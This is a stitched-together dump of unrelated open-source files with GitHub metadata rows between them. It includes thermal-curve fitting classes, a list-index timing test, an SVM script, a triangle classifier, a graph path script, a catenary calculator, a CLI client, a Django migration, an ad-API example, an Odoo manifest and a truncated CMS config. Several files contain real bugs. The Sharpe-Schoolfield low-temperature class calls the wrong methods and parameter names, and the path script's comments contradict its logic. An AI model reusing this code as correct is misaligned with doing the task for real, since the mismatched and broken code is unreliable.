to the Sharpe-Schoolfield model
Parameters
----------
ssf_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssf_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssf_model.params["B0"].value
E = self.ssf_model.params["E"].value
Eh = self.ssf_model.params["Eh"].value
El = self.ssf_model.params["El"].value
Th = self.ssf_model.params["Th"].value
Tl = self.ssf_model.params["Tl"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssf_fits = np.array(np.exp(model))
return self.ssf_fits
def fit_ssf(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssf_model = minimize(self.ssf_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssf_model
def ssf_estimates(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssf_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssf_model.init_values
return self.initial_params
def ssf_aic(self,ssf_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssf_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldHigh(ThermalModels):
model_name = "sharpeschoolhigh"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssh_model = self.fit_ssh(temps, traits, fit_pars)
if self.ssh_model is not None:
# Return fitted trait values
self.ssh_fits = self.ssh_fitted_vals(self.ssh_model)
# Return parameter estimates from the model
self.final_estimates = self.ssh_estimates(self.ssh_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssh_init_params(self.ssh_model)
# Return AIC score
self.AIC = self.ssh_aic(self.ssh_model)
def ssh_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssh_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
Th = self.fit_pars["Th"].value
# Eh must be greater than Eh
if E >= Eh:
return 1e10
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssh_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature.
Parameters
----------
ssf_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssh_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssh_model.params["B0"].value
E = self.ssh_model.params["E"].value
Eh = self.ssh_model.params["Eh"].value
Th = self.ssh_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssh_fits = np.array(np.exp(model))
return self.ssh_fits
def fit_ssh(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssh_model = minimize(self.ssh_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssh_model
def ssh_estimates(self, ssh_model):
""" Get parameter estimtes from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssh_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssh_model.init_values
return self.initial_params
def ssf_aic(self, ssh_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssh_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldlow(ThermalModels):
model_name = "sharpeschoollow"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssl_model = self.fit_ssh(temps, traits, fit_pars)
if self.ssl_model is not None:
# Return fitted trait values
self.ssl_fits = self.ssl_fitted_vals(self.ssl_model)
# Return parameter estimates from the model
self.final_estimates = self.ssl_estimates(self.ssl_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssl_init_params(self.ssl_model)
# Return AIC score
self.AIC = self.ssh_aic(self.ssl_model)
def ssl_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssl_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
El = self.fit_pars["Eh"].value
Tl = self.fit_pars["Th"].value
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssl_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature.
Parameters
----------
ssl_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssl_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssh_model.params["B0"].value
E = self.ssh_model.params["E"].value
El = self.ssh_model.params["Eh"].value
Tl = self.ssh_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssh_fits = np.array(np.exp(model))
return self.ssl_fits
def fit_ssh(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssl_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssl_model = minimize(self.ssl_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssl_model
def ssh_estimates(self, ssl_model):
""" Get parameter estimtes from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssl_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssl_model):
""" Get parameter estimtes from the model
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssl_model.init_values
return self.initial_params
def ssf_aic(self, ssl_model):
""" Get model AIC score
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssl_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
|
[
"noreply@github.com"
] |
hjosullivan.noreply@github.com
|
d115bee72cd6afec3acc95c9eb09d4221573f345
|
9abebf3d5b197a20a16829035e8d3623220c7822
|
/Chapter3/BigOListIndex.py
|
d355aab09621e3116e41f59a31b87c89427a2f5c
|
[] |
no_license
|
JoeVentrella/CS260
|
61e4e834f6c767d80cfe1e19460168f707e15bcd
|
a717f4b476b6e80f25cd74c8effc343624ec9b42
|
refs/heads/master
| 2020-08-08T04:19:33.906563
| 2019-12-15T01:54:40
| 2019-12-15T01:54:40
| 213,710,821
| 0
| 0
| null | 2019-10-08T17:57:35
| 2019-10-08T17:42:15
| null |
UTF-8
|
Python
| false
| false
| 765
|
py
|
import random
import timeit
exampleList = list(range(10000))
num = 10000
def bigOForListIndex(exampleList, n):
"""
Experiment to verify list index is O(1)
"""
for i in range(num):
index = random.randint(0, num-1)
exampleList[index]
def main():
for n in range(1000000, 10000001, 1000000):
exampleList = list(range(n))
indexTime = timeit.Timer("bigOForListIndex(exampleList,"+str(n)+")",
"from __main__ import exampleList,\
bigOForListIndex")
it = indexTime.timeit(number=1)
print ("Length of time for %d index access in %d list of"\
"numbers :%15.9f seconds" % (num, n, it))
if __name__ == '__main__':
main()
|
[
"ventrellajoe1@gmail.com"
] |
ventrellajoe1@gmail.com
|
8d311b4049baf3cfb4d2c9c41c06f410bd88211c
|
74e6ea749db5e989dcec9e85a6dadab44b73a91e
|
/restserver1/quickstart/svm.py
|
5aaf952eb9b89fe62df47c84fe7b73d10361507e
|
[] |
no_license
|
torahss/restserver
|
94d373c31cc54aef32f3eeb24844c6c4af7be604
|
dadcb1c8c08b7af375bda3f9c2bca47a63a5b761
|
refs/heads/master
| 2023-02-02T12:48:38.672797
| 2020-12-21T12:50:16
| 2020-12-21T12:50:16
| 323,330,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
import pandas as pd
def svmRun(inputdata) :
data = pd.read_csv('/var/www/restserver/quickstart/train.csv', header=0, index_col=0, squeeze=True)
dataset = pd.DataFrame(data)
t_data = pd.read_csv('/root/Downloads/test.csv', header=0, index_col=0, squeeze=True)
t_data = pd.DataFrame(t_data)
tr_y = dataset.iloc[:,4]
tr_data = dataset.iloc[:, [0, 1, 2, 3]]
test_y = t_data.iloc[:,4]
t_data = t_data.iloc[:, [0, 1, 2, 3]]
svm = SVC(kernel='rbf',C=1.0, random_state=1, gamma=0.1)
svm.fit(tr_data,tr_y)
#print(inputdata[0][1])
y_pre_test = svm.predict(t_data)
t_data.iloc[1:2,0] = inputdata[0][0]
t_data.iloc[1:2, 1] = inputdata[0][1]
t_data.iloc[1:2, 2] = inputdata[0][2]
t_data.iloc[1:2, 3] = inputdata[0][3]
y_pred = svm.predict(t_data.iloc[1:2, ])
if y_pred[0] == 'Good' :
result = 0
elif y_pred[0] == 'Normal' :
result = 1
elif y_pred[0] == 'Bad':
result = 2
elif y_pred[0] == 'Worst':
result =3
print("Accuracy : %.2f" % accuracy_score(test_y, y_pre_test))
return result
|
[
"sungsamhong@gmail.com"
] |
sungsamhong@gmail.com
|
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py
|
18e84ab880631f7510539ae77e9524b0eda2b632
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 621
|
py
|
# represents a triangle
class Triangle(object):
_kinds=["equilateral","isosceles","scalene"]
def __init__(self,a,b,c):
if a<=0 or b<=0 or c<=0:
raise TriangleError("Triangles cannot have zero or negative side length.")
if a+b<=c or a+c<=b or b+c<=a:
raise TriangleError("Triangles must satisfy the triangle inequality.")
self.sides=sorted([a,b,c])
def kind(self):
return Triangle._kinds[len(set(self.sides))-1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
def __init__(self,message):
super(TriangleError,self).__init__(message)
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
11b5246e31e2f5ef8ad5e9bcb8fdfabe438a1953
|
6defd2219720396842ac564e7d6bf4f5146eddda
|
/pycatenary.py
|
0918a0110a0feec62435cf74110d084ab14fdc9e
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
fsanges/pyCatenary-NoElast
|
2e111d379d36582b6b1851d4e4eb2bc004f4dc25
|
5901b06a208b802f12990ca0ecdce8c975c4a0e5
|
refs/heads/master
| 2021-12-01T20:55:56.685777
| 2013-04-01T11:46:34
| 2013-04-01T11:46:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,660
|
py
|
# !usr/bin/env python
# catenary calculation, re-written in python - NO Elasticity!!!
import math
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import fsolve
from inout import write_file
def cat(a):
# defining catenary function
#catenary eq (math): a*sinh(L/(2*a)+atanh(d/S))+a*sinh(L/(2*a)-atanh(d/S))-S=0
return a*math.sinh(L/(2*a))+math.atanh(d/S)+a*math.sinh(L/(2*a))-math.atanh(d/S)-S
L=float(input("Horizontal Distance between supports [m]: "))
d=float(input ("Vertical Distance between supports [m]: "))
S=float(input("Length of cable [m] - must be greater than distance between supports: "))
w=float(input("Unit weight of cable [kg/m]: "))
za=float(input("Elevation of higher support from reference plane [m]: "))
#checking if cable length is bigger than total distance between supports
distance=(L**2+d**2)**0.5
if S <= distance:
print ("Length of cable must be greater than TOTAL distance between supports!")
S=float(input("Length of cable [m]: "))
else:
pass
# solving catenary function for 'a'
a=fsolve(cat, 1)
# hor. distance between lowest catenary point (P) to higher support point (La)
La=a*(L/(2*a)+math.atanh(d/S))
# hor. distance between lowest catenary point (P) to lower support point (Lb)
Lb=L-La
# vert. distance from higher support point to lowest point (P) in catenary (ha)
ha=a*math.cosh(La/a)-a
## calculating reaction forces and angles
# catenary lenght between support "A" (higher) and "P" - Sa
Sa=a*math.sinh(La/a)
# catenary lenght between support "B" )lower) and "P" - Sb
Sb=a*math.sinh(Lb/a)
# horizontal tension - constant through catenary: H
H=w*a
# vertical tension at "A" (Va) and "B" (Vb)
Va=Sa*w
Vb=Sb*w
# tension at "A" (TA) and B (TB)
TA=(H**2+Va**2)**0.5
TB=(H**2+Vb**2)**0.5
# inclination angles from vertical at "A" (ThetA) and B (ThetB)
ThetA=math.atan(H/Va)
ThetB=math.atan(H/Vb)
ThetAd=ThetA*180/math.pi;
ThetBd=ThetB*180/math.pi;
# establishing A, B and P in coordinate system
# index "a" corresponding to point "A", "b" to "B"-point and "P" to lowest caten. point
zb=za-d
zp=za-ha
xa=La
xp=0
xb=-Lb
# writting results to file
fname='catenary_res.txt'
fn=open(fname, 'a')
write_file(fn, "Horizontal Distance between supports in meters: ", round(L,3))
write_file(fn, "Catenary length in meters: ", round(S,3))
write_file(fn, "Vertical Distance Between supports in meters: ", round(d,3))
write_file(fn, "Unit Weight of Catenary line in kg/m: ", round(w,3))
write_file(fn, "Elevation of higher support (A) from reference plane in meters: ", round(za,3))
write_file(fn, "\Catenary coef.: ", round(a,5))
write_file(fn, "Horizontal tension in kg (constant along line: ", round(H,3))
write_file(fn, "Vertical tension in A in kg: ", round(Va,3))
write_file(fn, "Total tension in A in kg: ", round(TA,3))
write_file(fn, "Total tension in B in kg: ", round(TB,3))
write_file(fn, "Inclination angle from vertical at A in radians: ", round(ThetA,3))
write_file(fn, "Inclination angle from vertical at B in radians: ", round(ThetB,3))
write_file(fn, "Inclination angle from vertical at A in degrees: ", round(ThetAd,3))
write_file(fn, "Inclination angle from vertical at B in degrees: ", round(ThetBd,3))
fn.close()
# graphing catenary curve - matplotlib & writting coordinates in file
xinc=L/100
y=[]
xc=[]
fncoords="catenary_coords.txt"
fn=open(fncoords, "a")
for x in np.arange (xb, xa+xinc, xinc):
ycal=a*math.cosh(x/a)
fn.write("\n")
fn.write(str(round(x,3)))
fn.write("\t")
fn.write(str(round(ycal[0],3)))
y.append(ycal)
xc.append(x)
fn.close()
# plotting, finally
plt.plot(xc,y)
plt.xlabel("X-distance [m]")
plt.ylabel("Y-distance [m]")
plt.grid()
plt.show()
|
[
"deki.djokic@gmail.com"
] |
deki.djokic@gmail.com
|
748f97751e80a2258b78d59ce4a378db9a54d1b5
|
b743a6b89e3e7628963fd06d2928b8d1cdc3243c
|
/bpl_client/Client.py
|
c9143098c648f30df369d458d22b99d0e6d61a3a
|
[
"MIT"
] |
permissive
|
DuneRoot/bpl-cli
|
847248d36449181856e6cf34a18119cd9fc1b045
|
3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28
|
refs/heads/master
| 2020-03-25T17:42:06.339501
| 2019-02-20T19:20:26
| 2019-02-20T19:20:26
| 143,990,801
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,781
|
py
|
"""
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
def __init__(self):
"""
Client Class.
Retrieves options from docopt. Options are then filtered using data stored in commands.json.
Command is then imported and instantiated.
"""
self._options = docopt(__doc__, version=__version__)
self._arguments = {
k: v for k, v in self._options.items()
if not isinstance(v, bool)
}
commands_json = json.loads(read_file(COMMANDS_JSON))
command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
getattr(
import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
command["Class Identifier"]
)(self._arguments).run()
def _is_command(self, conditions):
return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
|
[
"johnyob132@gmail.com"
] |
johnyob132@gmail.com
|
8c933fd456834988004265d8cb6e1a7801ec7b35
|
b013eb7ffc0c41e874c04a55065de96a9313ab17
|
/longest_path1.py
|
f3d3b164a7b8e8b0244d280f07fd701a95f4287a
|
[] |
no_license
|
YuiGao/shortest_longest_path
|
69fcf5724cfb03e7a94f33b507fa25e7c41f69ed
|
111d85c2fa090b497cc2896ddf644a21ffc4e69f
|
refs/heads/master
| 2020-05-07T19:29:09.282219
| 2019-04-11T14:54:47
| 2019-04-11T14:54:47
| 180,815,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
nodes = ('A', 'B', 'C', 'D', 'E', 'F', 'G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
distances = {
'A':{'B':5,'C':6,'D':4,'E':7},
'B':{'A':5,'F':2,'G':3},
'C':{'A':6,'F':6,'G':4,'H':1},
'D':{'A':4,'G':7,'H':3,'I':6},
'E':{'A':7,'H':9,'I':1},
'F':{'B':2,'C':6,'J':2,'K':3},
'G':{'B':3,'C':4,'D':7,'J':6,'K':4,'L':1},
'H':{'C':1,'D':3,'E':9,'K':7,'L':3,'M':6},
'I':{'D':6,'E':1,'L':9,'M':7},
'J':{'F':2,'G':6,'N':2,'O':3},
'K': {'F': 3, 'G': 4, 'H': 7, 'N': 6, 'O': 4, 'P': 1},
'L': {'G': 1, 'H': 3, 'I': 9, 'O': 7, 'P': 10, 'Q': 6},
'M': {'H': 6, 'I': 7, 'P': 9, 'Q': 8},
'N': {'J': 2, 'K': 6, 'R': 2, 'S': 3},
'O': {'J': 3, 'K': 4, 'L': 7, 'R': 6, 'S': 4, 'T': 1},
'P': {'K': 1, 'L': 10, 'M': 9, 'S': 7, 'T': 3, 'U': 6},
'Q': {'L': 6, 'M': 8, 'T': 9, 'U': 1},
'R': {'N': 2, 'O': 6, 'V': 2, 'W': 3},
'S': {'N': 3, 'O': 4, 'P': 7, 'V': 6, 'W': 4, 'X': 1},
'T': {'O': 1, 'P': 3, 'Q': 9, 'W': 7, 'X': 3, 'Y': 6},
'U': {'P': 6, 'Q': 1, 'X': 9, 'Y': 1},
'V': {'R': 2, 'S': 6, 'Z': 5},
'W': {'R': 3, 'S': 4, 'T': 7, 'Z': 6},
'X': {'S': 1, 'T': 3, 'U': 9, 'Z': 4},
'Y': {'T': 6, 'U': 1, 'Z': 7},
'Z': {'V': 5, 'W': 6, 'X': 4, 'Y': 7}
}
unvisited = {node: None for node in nodes} #把None作为无穷大使用
visited = {}#用来记录已经松弛过的数组
current = 'A' #要找A点到其他点的距离
currentDistance = 0
unvisited[current] = currentDistance#A到A的距离记为0
while True:
for neighbour, distance in distances[current].items():
if neighbour not in unvisited: continue#被访问过了,跳出本次循环
newDistance = currentDistance + distance#新的距离
if unvisited[neighbour] is None or unvisited[neighbour] < newDistance:#如果两个点之间的距离之前是无穷大或者新距离小于原来的距离
unvisited[neighbour] = newDistance#更新距离
visited[current] = currentDistance#这个点已经松弛过,记录
del unvisited[current]#从未访问过的字典中将这个点删除
if not unvisited: break#如果所有点都松弛过,跳出此次循环
candidates = [node for node in unvisited.items() if node[1]]#找出目前还有拿些点未松弛过
current, currentDistance = sorted(candidates, key = lambda x: x[1])[0]#找出目前可以用来松弛的点
if(current == "Z"):
print('Start-End最长路径长度为:',currentDistance)
|
[
"1205319351@qq.com"
] |
1205319351@qq.com
|
7f7434016d940893c9cb3b72ea218d424554329e
|
ea416617fdf6632081cb91fccfb2e8fa5965ad9e
|
/plan/migrations/0002_route.py
|
f4cf7c2b4ef825c3680cda2b86819c90200f91f0
|
[] |
no_license
|
fergalpowell/final_year_project
|
249f8289ab84b5daba98a9f262e1a2637760cd49
|
568e8cb646ccf5b6a25c1368ffd2204d7d5f08ab
|
refs/heads/master
| 2021-09-13T17:29:26.868935
| 2018-05-02T15:03:14
| 2018-05-02T15:03:14
| 112,532,473
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 698
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 11:22
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('plan', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Route',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('route', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
('name', models.CharField(max_length=250)),
],
),
]
|
[
"fergal.powell@gmail.com"
] |
fergal.powell@gmail.com
|
4327917009b231fd6cbcb15c547b3403e777d4b3
|
856762ba0c6c69f4b086689764fad0d019a50146
|
/图片颜色分割.py
|
9d7ada5b5d96e3196d6bf53313ed2f2350199158
|
[] |
no_license
|
JonathanScoot/Events
|
bc9ec0194a972fe677693a1a8bff7539ff474bbf
|
795442eb56345b876847ce3c32ea4ea0631ddfb9
|
refs/heads/master
| 2020-04-30T13:37:13.664734
| 2019-03-21T03:33:32
| 2019-03-21T03:33:32
| 176,863,623
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
import cv2
import numpy as np
cap = cv2.imread('/Users/wangjie/Desktop/road1.jpg', 0)
while True:
displayimage = cv2.imshow('road', cap)
k=cv2.waitKey(5) &0xFF
if k==27:
break
cv2.destroyAllWindows()
cv2.line()
|
[
"Jonathan@MacBook-Pro-2.lan"
] |
Jonathan@MacBook-Pro-2.lan
|
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9
|
7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a
|
/examples/adspygoogle/dfp/v201101/get_licas_by_statement.py
|
9086f2f5d7006a77c1a7b578138725bf4db3479b
|
[
"Apache-2.0"
] |
permissive
|
hockeyprincess/google-api-dfp-python
|
534519695ffd26341204eedda7a8b50648f12ea9
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
refs/heads/master
| 2021-01-10T10:01:09.445419
| 2011-04-14T18:25:38
| 2011-04-14T18:25:38
| 52,676,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,266
|
py
|
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
values = [{
'key': 'lineItemId',
'value': {
'xsi_type': 'NumberValue',
'value': line_item_id
}
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
filter_statement)[0]['results']
# Display results.
for lica in licas:
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
|
[
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] |
api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138
|
431bab8eea3abbc7fae959c140647f6a74cb2440
|
a266cfe89cf9c7347abf712e3b800468438448c2
|
/extra_addons/formio_data_api/__manifest__.py
|
1449bd63251da49b08f0d9e19d5075ac17b82eaf
|
[] |
no_license
|
cialuo/project_template
|
db8b9f9c4115a6d44363a39e311363e8f3e7807f
|
2f875bdc5b730afeae3dd8dffafde852d0a44936
|
refs/heads/main
| 2023-03-09T17:50:55.398557
| 2021-02-24T00:17:59
| 2021-02-24T00:17:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
# Copyright Nova Code (http://www.novacode.nl)
# See LICENSE file for full licensing details.
{
'name': 'Forms | Data API',
'summary': 'Python API for Forms data (builder, form/submission).',
'version': '0.5',
'license': 'LGPL-3',
'author': 'Nova Code',
'website': 'https://www.novacode.nl',
'live_test_url': 'https://demo13.novacode.nl',
'category': 'Extra Tools',
'depends': ['formio'],
'data': [],
'external_dependencies': {
'python': ['formio-data'],
},
'application': False,
'images': [
'static/description/banner.gif',
],
'description': """
Forms | Data API
================
"""
}
|
[
"dungth@trobz.com"
] |
dungth@trobz.com
|
7efbf28a97b17e623a9be0e1d817befa061257fc
|
fe061550aa4a6d894aba6fc91ec3f4a9c276ee5d
|
/ALCARAW_RECO/python/pdfSystematics_cff.py
|
25c61242fc5df1a2a7699333ce47b47e4d7cdd91
|
[] |
no_license
|
ldcorpe/ECALELF
|
0f11c04c63cd4ef9c0fac9168d827c8b4d99eada
|
6f8196c6c455b9ff092007ea5d0e69fc6e68a517
|
refs/heads/master
| 2020-12-30T22:08:58.160533
| 2014-03-05T09:35:07
| 2014-03-05T09:35:07
| 17,245,358
| 0
| 0
| null | 2015-07-23T17:14:56
| 2014-02-27T10:37:42
|
C++
|
UTF-8
|
Python
| false
| false
| 727
|
py
|
import FWCore.ParameterSet.Config as cms
# Produce PDF weights (maximum is 3)
pdfWeights = cms.EDProducer("PdfWeightProducer",
# Fix POWHEG if buggy (this PDF set will also appear on output,
# so only two more PDF sets can be added in PdfSetNames if not "")
#FixPOWHEG = cms.untracked.string("cteq66.LHgrid"),
#GenTag = cms.untracked.InputTag("genParticles"),
PdfInfoTag = cms.untracked.InputTag("generator"),
